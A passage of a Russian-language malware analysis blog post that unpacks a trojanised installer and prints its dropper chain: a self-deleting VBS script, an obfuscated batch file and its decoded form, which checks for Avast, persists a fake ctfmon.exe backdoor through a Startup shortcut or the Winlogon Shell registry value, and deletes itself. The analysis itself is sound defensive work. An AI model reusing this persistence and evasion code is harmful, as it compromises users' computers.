\u0420\u0430\u0437 \u043a\u0442\u043e-\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0430\u0440\u0445\u0438\u0432\u0430\u0442\u043e\u0440, \u0442\u043e \u043a\u0442\u043e-\u043d\u0438\u0431\u0443\u0434\u044c \u0434\u0440\u0443\u0433\u043e\u0439 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e\u043b\u0436\u0435\u043d \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0449\u0438\u043a \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f \u2014 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043b \u043f\u043e\u0438\u0441\u043a. \u0417\u0430\u043f\u0440\u043e\u0441 \u00abinno setup decompiler\u00bb \u0441\u0445\u043e\u0434\u0443 \u0434\u0430\u043b <a href=\"http:\/\/innounp.sourceforge.net\/\">\u043d\u0443\u0436\u043d\u044b\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442<\/a>. \u041e\u0442\u043b\u0438\u0447\u043d\u043e! \u0421\u043a\u0430\u0447\u0430\u043b \u0435\u0433\u043e \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b:  <\/p>\n<pre><code class=\"dos\">d:\\virus\\poi&gt;innounp -x -p345465122345 poi.exe ; Version detected: 5500 (Unicode) #0 {app}\\avicap32.dll Reading slice d:\\virus\\poi\\poi.exe #1 {app}\\ctfmon.exe #2 {app}\\test.bat #3 {app}\\test.vbs #4 install_script.iss <\/code><\/pre>\n<p>  \u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0449\u0438\u043a \u0431\u044b\u0441\u0442\u0440\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u0441\u0432\u043e\u044e \u0440\u0430\u0431\u043e\u0442\u0443 \u0438 \u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f. \u041d\u0430\u0447\u0430\u043b \u044f \u0441 \u0444\u0430\u0439\u043b\u0430 install_script.iss. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0432 \u043d\u0451\u043c \u0431\u044b\u043b\u0430 \u0441\u0435\u043a\u0446\u0438\u044f [Run]:  <\/p>\n<pre><code class=\"dos\">Filename: &quot;{app}\\test.vbs&quot;; Description: &quot;{cm:LaunchProgram,Test}&quot;; MinVersion: 0.0,5.0; Flags: shellexec postinstall nowait <\/code><\/pre>\n<p>  \u0418\u0437 \u043d\u0435\u0451 \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043f\u0435\u0440\u0432\u044b\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f VB-\u0441\u043a\u0440\u0438\u043f\u0442 test.vbs:  <\/p>\n<pre><code class=\"dos\">On Error Resume Next Set WshShell = CreateObject(&quot;WScript.Shell&quot;) WshShell.Run &quot;test.bat&quot;,0,true Set FSO = CreateObject(&quot;Scripting.FileSystemObject&quot;) FSO.DeleteFile WScript.ScriptFullName, 0 <\/code><\/pre>\n<p>  \u0421\u043a\u0440\u0438\u043f\u0442 \u0442\u043e\u0436\u0435 \u043d\u0435\u0441\u043b\u043e\u0436\u043d\u044b\u0439: \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 test.bat \u0438 \u0441\u0430\u043c\u043e\u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0435\u0442\u0441\u044f.<\/p>\n<p>  \u0422\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0442\u0440\u0438\u043c test.bat:<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0422\u044c\u0444\u0443 \u0442\u044b, \u0447\u0451\u0440\u0442, \u0442\u0435\u043f\u0435\u0440\u044c \u042e\u0441\u0442\u0430\u0441 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u0444\u0438\u0440\u0443\u0435\u0442 \u0410\u043b\u0435\u043a\u0441\u0443!<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"dos\">set lpQmnLQ=set %lpQmnLQ% RCRUDqE= %lpQmnLQ%%RCRUDqE%yFcQKpJyG== %lpQmnLQ%%RCRUDqE%aaLTgkA%yFcQKpJyG%# %lpQmnLQ%%RCRUDqE%kOXeOOyR%yFcQKpJyG%@ %lpQmnLQ%%RCRUDqE%toTUt%yFcQKpJyG%o %lpQmnLQ%%RCRUDqE%mRMLJkAp%yFcQKpJyG%\/ %lpQmnLQ%%RCRUDqE%IHrQ%yFcQKpJyG%; %lpQmnLQ%%RCRUDqE%immQQhH%yFcQKpJyG%c %lpQmnLQ%%RCRUDqE%ksBw%yFcQKpJyG%Q %lpQmnLQ%%RCRUDqE%qlLeeJ%yFcQKpJyG%f %lpQmnLQ%%RCRUDqE%QvBGN%yFcQKpJyG%E %lpQmnLQ%%RCRUDqE%SAKEFniaY%yFcQKpJyG%G %lpQmnLQ%%RCRUDqE%hmixayLOL%yFcQKpJyG%M %lpQmnLQ%%RCRUDqE%oaLFfs%yFcQKpJyG%} %lpQmnLQ%%RCRUDqE%NjHP%yFcQKpJyG%K %lpQmnLQ%%RCRUDqE%MuOksUDd%yFcQKpJyG%u %lpQmnLQ%%RCRUDqE%upeuMhJ%yFcQKpJyG%H %lpQmnLQ%%RCRUDqE%mOMhgb%yFcQKpJyG%y %lpQmnLQ%%RCRUDqE%NSQCAVz%yFcQKpJyG%: %lpQmnLQ%%RCRUDqE%dxmCkR%yFcQKpJyG%[ %lpQmnLQ%%RCRUDqE%ScSLQo%yFcQKpJyG%l %lpQmnLQ%%RCRUDqE%iGpKA%yFcQKpJyG%0 %lpQmnLQ%%RCRUDqE%MKbjyO%yFcQKpJyG%R %lpQmnLQ%%RCRUDqE%tCgoVQ%yFcQKpJyG%+ %lpQmnLQ%%RCRUDqE%KbJyRFMVu%yFcQKpJyG%( %lpQmnLQ%%RCRUDqE%yOmTK%yFcQKpJyG%B %lpQmnLQ%%RCRUDqE%DGHR%yFcQKpJyG%8 %lpQmnLQ%%RCRUDqE%LKQhkKSem%yFcQKpJyG%s %lpQmnLQ%%RCRUDqE%UtIjaUOl%yFcQKpJyG%X %lpQmnLQ%%RCRUDqE%KYddI%yFcQKpJyG%A %lpQmnLQ%%RCRUDqE%TMuVQ%yFcQKpJyG%4 %lpQmnLQ%%RCRUDqE%dAMOY%yFcQKpJyG%) %lpQmnLQ%%RCRUDqE%vpVg%yFcQKpJyG%_ %lpQmnLQ%%RCRUDqE%aeVO%yFcQKpJyG%J %lpQmnLQ%%RCRUDqE%YrtVU%yFcQKpJyG%b %lpQmnLQ%%RCRUDqE%vANLWtdW%yFcQKpJyG%d %lpQmnLQ%%RCRUDqE%tNqAVXbz%yFcQKpJyG%m %lpQmnLQ%%RCRUDqE%LkyqXKNYc%yFcQKpJyG%e %lpQmnLQ%%RCRUDqE%ltuAgKR%yFcQKpJyG%w %lpQmnLQ%%RCRUDqE%GNbpPXWvQ%yFcQKpJyG%a %lpQmnLQ%%RCRUDqE%QBmzz%yFcQKpJyG%i %lpQmnLQ%%RCRUDqE%pNywcj%yFcQKpJyG%C %lpQmnLQ%%RCRUDqE%sQrHzBN%yFcQKpJyG%v %lpQmnLQ%%RCRUDqE%DCbQQGfkL%yFcQKpJyG%2 %lpQmnLQ%%RCRUDqE%zUwuD%yFcQKpJyG%z %lpQmnLQ%%RCRUDqE%abWkRpti%yFcQKpJyG%S %lpQmnLQ%%RCRUDqE%mPVfEbE%yFcQKpJyG%r %lpQmnLQ%%RCRUDqE%sIluXDQS%yFcQKpJyG%7 %lpQmnLQ%%RCRUDqE%OWatTKvD%yFcQKpJyG%x %lpQmnLQ%%RCRUDqE%krFh%yFcQKpJyG%5 %lpQmnLQ%%RCRUDqE%UdGiq%yFcQKpJyG%T %lpQmnLQ%%RCRUDqE%kHci%yFcQKpJyG%] %lpQmnLQ%%RCRUDqE%pVCdLFa%yFcQKpJyG%, %lpQmnLQ%%RCRUDqE%nmvE%yFcQKpJyG%j %lpQmnLQ%%RCRUDqE%zHzGVcDcY%yFcQKpJyG%k %lpQmnLQ%%RCRUDqE%GAJoRj%yFcQKpJyG%n %lpQmnLQ%%RCRUDqE%DNmdQ%yFcQKpJyG%q %lpQmnLQ%%RCRUDqE%oAndDQK%yFcQKpJyG%L %lpQmnLQ%%RCRUDqE%lSBY%yFcQKpJyG%O %lpQmnLQ%%RCRUDqE%JcERxC%yFcQKpJyG%h %lpQmnLQ%%RCRUDqE%pcEihxAuJ%yFcQKpJyG%I %lpQmnLQ%%RCRUDqE%shHyBbWt%yFcQKpJyG%. %lpQmnLQ%%RCRUDqE%KAFkG%yFcQKpJyG%- %lpQmnLQ%%RCRUDqE%AdQY%yFcQKpJyG%t %lpQmnLQ%%RCRUDqE%pIxi%yFcQKpJyG%Y %lpQmnLQ%%RCRUDqE%TKaBbO%yFcQKpJyG%1 %lpQmnLQ%%RCRUDqE%pCQWd%yFcQKpJyG%F %lpQmnLQ%%RCRUDqE%gEuKD%yFcQKpJyG%V %lpQmnLQ%%RCRUDqE%ulmeh%yFcQKpJyG%9 %lpQmnLQ%%RCRUDqE%nFjJmCQ%yFcQKpJyG%N %lpQmnLQ%%RCRUDqE%hdvdM%yFcQKpJyG%W %lpQmnLQ%%RCRUDqE%jgpoj%yFcQKpJyG%&quot; %lpQmnLQ%%RCRUDqE%xMhHMK%yFcQKpJyG%6 %lpQmnLQ%%RCRUDqE%aOOInC%yFcQKpJyG%3 %lpQmnLQ%%RCRUDqE%GLznBQ%yFcQKpJyG%U %lpQmnLQ%%RCRUDqE%oFHOxG%yFcQKpJyG%g %lpQmnLQ%%RCRUDqE%KudP%yFcQKpJyG%{ %lpQmnLQ%%RCRUDqE%QSrCDDA%yFcQKpJyG%$ %lpQmnLQ%%RCRUDqE%XLAkzKtxq%yFcQKpJyG%* %lpQmnLQ%%RCRUDqE%opQB%yFcQKpJyG%Z %lpQmnLQ%%RCRUDqE%wjTBiTbn%yFcQKpJyG%\\ %lpQmnLQ%%RCRUDqE%XnXWCNDJO%yFcQKpJyG%! %lpQmnLQ%%RCRUDqE%fjxrTBqkC%yFcQKpJyG%p %lpQmnLQ%%RCRUDqE%DuPVUEGE%yFcQKpJyG%D %lpQmnLQ%%RCRUDqE%mnCdWrg%yFcQKpJyG%? %lpQmnLQ%%RCRUDqE%DYBqxQkr%yFcQKpJyG%P %AdQY%%GNbpPXWvQ%%LKQhkKSem%%zHzGVcDcY%%ScSLQo%%QBmzz%%LKQhkKSem%%AdQY%%RCRUDqE%|%RCRUDqE%%qlLeeJ%%QBmzz%%GAJoRj%%vANLWtdW%%RCRUDqE%%jgpoj%%KYddI%%sQrHzBN%%GNbpPXWvQ%%LKQhkKSem%%AdQY%%GLznBQ%%pcEihxAuJ%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj% %QBmzz%%qlLeeJ%%RCRUDqE%%LkyqXKNYc%%mPVfEbE%%mPVfEbE%%toTUt%%mPVfEbE%%ScSLQo%%LkyqXKNYc%%sQrHzBN%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%TKaBbO%%RCRUDqE%%oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%nFjJmCQ%%toTUt%%MKbjyO%%LkyqXKNYc%%immQQhH%%toTUt%%mPVfEbE%%vANLWtdW% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %kOXeOOyR%%tNqAVXbz%%LKQhkKSem%%JcERxC%%AdQY%%GNbpPXWvQ%%RCRUDqE%%sQrHzBN%%YrtVU%%LKQhkKSem%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%NSQCAVz%%QvBGN%%OWatTKvD%%LkyqXKNYc%%immQQhH%%MuOksUDd%%AdQY%%LkyqXKNYc%%KbJyRFMVu%%jgpoj%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%OWatTKvD%%yFcQKpJyG%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%lSBY%%YrtVU%%nmvE%%LkyqXKNYc%%immQQhH%%AdQY%%KbJyRFMVu%%jgpoj%%jgpoj%%hdvdM%%abWkRpti%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%shHyBbWt%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%mOMhgb%%yFcQKpJyG%%OWatTKvD%%shHyBbWt%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%abWkRpti%%JcERxC%%toTUt%%mPVfEbE%%AdQY%%immQQhH%%MuOksUDd%%AdQY%%KbJyRFMVu%%OWatTKvD%%shHyBbWt%%abWkRpti%%fjxrTBqkC%%LkyqXKNYc%%immQQhH%%QBmzz%%GNbpPXWvQ%%ScSLQo%%pCQWd%%toTUt%%ScSLQo%%vANLWtdW%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%KbJyRFMVu%%jgpoj%%jgpoj%%abWkRpti%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%MuOksUDd%%fjxrTBqkC%%jgpoj%%jgpoj%%dAMOY%%tCgoVQ%%jgpoj%%jgpoj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%shHyBbWt%%ScSLQo%%GAJoRj%%zHzGVcDcY%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%mOMhgb%%shHyBbWt%%UdGiq%%GNbpPXWvQ%%mPVfEbE%%oFHOxG%%LkyqXKNYc%%AdQY%%DYBqxQkr%%GNbpPXWvQ%%AdQY%%JcERxC%%yFcQKpJyG%%jgpoj%%jgpoj%%~dp0ctfmon.exe&quot;&quot;:y.Save():Close()&quot;) %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%&gt;%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% %oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%DuPVUEGE%%toTUt%%GAJoRj%%LkyqXKNYc% :NoRecord %mPVfEbE%%LkyqXKNYc%%oFHOxG%%RCRUDqE%%GNbpPXWvQ%%vANLWtdW%%vANLWtdW%%RCRUDqE%%jgpoj%%upeuMhJ%%NjHP%%QvBGN%%pIxi%%vpVg%%pNywcj%%GLznBQ%%MKbjyO%%MKbjyO%%QvBGN%%nFjJmCQ%%UdGiq%%vpVg%%GLznBQ%%abWkRpti%%QvBGN%%MKbjyO%%wjTBiTbn%%abWkRpti%%toTUt%%qlLeeJ%%AdQY%%ltuAgKR%%GNbpPXWvQ%%mPVfEbE%%LkyqXKNYc%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%LKQhkKSem%%toTUt%%qlLeeJ%%AdQY%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%vANLWtdW%%toTUt%%ltuAgKR%%LKQhkKSem%%RCRUDqE%%nFjJmCQ%%UdGiq%%wjTBiTbn%%pNywcj%%MuOksUDd%%mPVfEbE%%mPVfEbE%%LkyqXKNYc%%GAJoRj%%AdQY%%gEuKD%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%QBmzz%%toTUt%%GAJoRj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%ScSLQo%%toTUt%%oFHOxG%%toTUt%%GAJoRj%%jgpoj%%RCRUDqE%%mRMLJkAp%%sQrHzBN%%RCRUDqE%%jgpoj%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%RCRUDqE%%mRMLJkAp%%AdQY%%RCRUDqE%%MKbjyO%%QvBGN%%SAKEFniaY%%vpVg%%abWkRpti%%opQB%%RCRUDqE%%mRMLJkAp%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%RCRUDqE%%pVCdLFa%%RCRUDqE%%LkyqXKNYc%%OWatTKvD%%fjxrTBqkC%%ScSLQo%%toTUt%%mPVfEbE%%LkyqXKNYc%%mPVfEbE%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj%%RCRUDqE%%RCRUDqE%%mRMLJkAp%%qlLeeJ% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %LKQhkKSem%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%RCRUDqE%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%&gt;%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% :Done <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u041b\u0435\u043d\u044c \u043e\u043f\u044f\u0442\u044c \u0432\u0437\u044f\u043b\u0430 \u0432\u0435\u0440\u0445 \u043d\u0430\u0434\u043e \u043c\u043d\u043e\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u044f \u043d\u0435 \u0441\u0442\u0430\u043b \u043f\u0430\u0440\u0438\u0442\u044c\u0441\u044f \u0441 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0430\u043c\u0438, \u0430 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0434\u0440\u0443\u0433\u0430 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043a\u0443 \u043d\u0430 C#. \u0427\u0442\u043e \u043e\u043d \u0438 \u0441\u0434\u0435\u043b\u0430\u043b. \u041d\u0438\u0437\u043a\u0438\u0439 \u0435\u043c\u0443 \u0437\u0430 \u044d\u0442\u043e \u043f\u043e\u043a\u043b\u043e\u043d!<\/p>\n<p>  \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0441\u044f \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 bat-\u0444\u0430\u0439\u043b:  <\/p>\n<pre><code class=\"dos\">tasklist | find &quot;AvastUI.exe&quot; if errorlevel 1 goto NoRecord cd &quot;%appData%\\MicrocoftUpdate\\&quot; del sendok.txt del poi.exe @mshta vbscript:Execute(&quot;Set x=CreateObject(&quot;&quot;WScript.Shell&quot;&quot;):Set y=x.CreateShortcut(x.SpecialFolders(&quot;&quot;Startup&quot;&quot;)+&quot;&quot;\\WinUpdate.lnk&quot;&quot;):y.TargetPath=&quot;&quot;%~dp0ctfmon.exe&quot;&quot;:y.Save():Close()&quot;) del %0 &gt; nul goto Done :NoRecord reg add &quot;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon&quot; \/v &quot;Shell&quot; \/t REG_SZ \/d &quot;%appData%\\MicrocoftUpdate\\ctfmon.exe , explorer.exe&quot;  \/f cd &quot;%appData%\\MicrocoftUpdate\\&quot; del sendok.txt del poi.exe start ctfmon.exe del %0 &gt; nul :Done <\/code><\/pre>\n<p>  \u0422\u0443\u0442 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435: \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430 Avast. \u0415\u0441\u043b\u0438 \u0442\u0430\u043a\u043e\u0432\u043e\u0439 \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u0432 \u043f\u0430\u043f\u043a\u0443 &quot;%appData%\\MicrocoftUpdate\\&quot;, \u0438\u0437 \u043d\u0435\u0451 \u0443\u0434\u0430\u043b\u044f\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b sendok.txt \u0438 poi.exe, \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u043f\u0430\u043f\u043a\u0435 \u00abStartup\u00bb \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u044f\u0440\u043b\u044b\u043a \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b ctfmon.exe \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u043b\u0438\u043a\u0432\u0438\u0434\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0435\u0433\u043e bat-\u0444\u0430\u0439\u043b\u0430. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c ctfmon.exe \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u043f\u0440\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u0415\u0441\u043b\u0438 \u0436\u0435 Avast \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d, \u0442\u043e \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u043f\u043e \u043f\u0443\u0442\u0438 \u00abHKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u00bb \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u043b\u044e\u0447\u0430 \u00abShell\u00bb \u0437\u0430\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 &quot;%appData%\\MicrocoftUpdate\\ctfmon.exe, explorer.exe&quot;, \u043d\u0443 \u0430 \u043f\u043e\u0442\u043e\u043c \u043e\u043f\u044f\u0442\u044c \u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u0432 \u043f\u0430\u043f\u043a\u0443 &quot;%appData%\\MicrocoftUpdate\\&quot;, \u0443\u0434\u0430\u043b\u044f\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b sendok.txt \u0438 poi.exe, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f ctfmon.exe \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u043b\u0438\u043a\u0432\u0438\u0434\u0430\u0446\u0438\u044f bat-\u0444\u0430\u0439\u043b\u0430. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, ctfmon.exe \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c\u0441\u044f \u043f\u0440\u0438 \u0441\u0442\u0430\u0440\u0442\u0435 \u043b\u044e\u0431\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u0447\u0435\u0440\u0435\u0437 \u041f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a Windows.<\/p>\n<p>  \u0412\u0441\u0451, \u043a\u043e\u043d\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u0441\u0432\u043e\u044e \u0433\u0440\u044f\u0437\u043d\u0443\u044e \u0440\u0430\u0431\u043e\u0442\u0443 \u2013 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0431\u044d\u043a\u0434\u043e\u0440. \u0422\u0435\u043f\u0435\u0440\u044c \u043e\u0431\u0440\u0430\u0442\u0438\u043c \u0432\u0437\u043e\u0440\u044b \u043d\u0430 \u0432\u0438\u043d\u043e\u0432\u043d\u0438\u043a\u0430 \u0442\u043e\u0440\u0436\u0435\u0441\u0442\u0432\u0430 \u2014 \u0444\u0430\u0439\u043b ctfmon.exe.<\/p>\n<h2>\u0427\u0430\u0441\u0442\u044c \u0447\u0435\u0442\u0432\u0451\u0440\u0442\u0430\u044f: \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430<\/h2>\n<p>  \u041e\u0441\u043c\u043e\u0442\u0440 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043b\u0441\u044f \u0441\u043d\u0430\u0440\u0443\u0436\u0438 \u2014 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c Process Monitor \u0438 WireShark.<\/p>\n<p>  \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u043b\u044f\u043d\u0435\u043c \u0432 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430 exe-\u0444\u0430\u0439\u043b\u0430:<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/d2c\/6aa\/59c\/d2c6aa59c01c48318620de279976c18f.png\"\/><\/p>\n<p>  \u0417\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0439\u0434\u0451\u043c\u0441\u044f \u043f\u043e \u043b\u043e\u0433\u0443 Process Monitor-\u0430 \u0432 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u0441\u043b\u043e\u0432\u0430 \u00abMicrocoft\u00bb. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u043c \u0432 \u0444\u0438\u043b\u044c\u0442\u0440 \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e:<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/213\/833\/855\/21383385502545aa95b524cdf4e355bd.png\"\/><\/p>\n<p>  \u0418 \u0447\u0442\u043e \u0436\u0435 \u043c\u044b \u0432\u0438\u0434\u0438\u043c? \u041c\u044b \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e ctfmon.exe \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 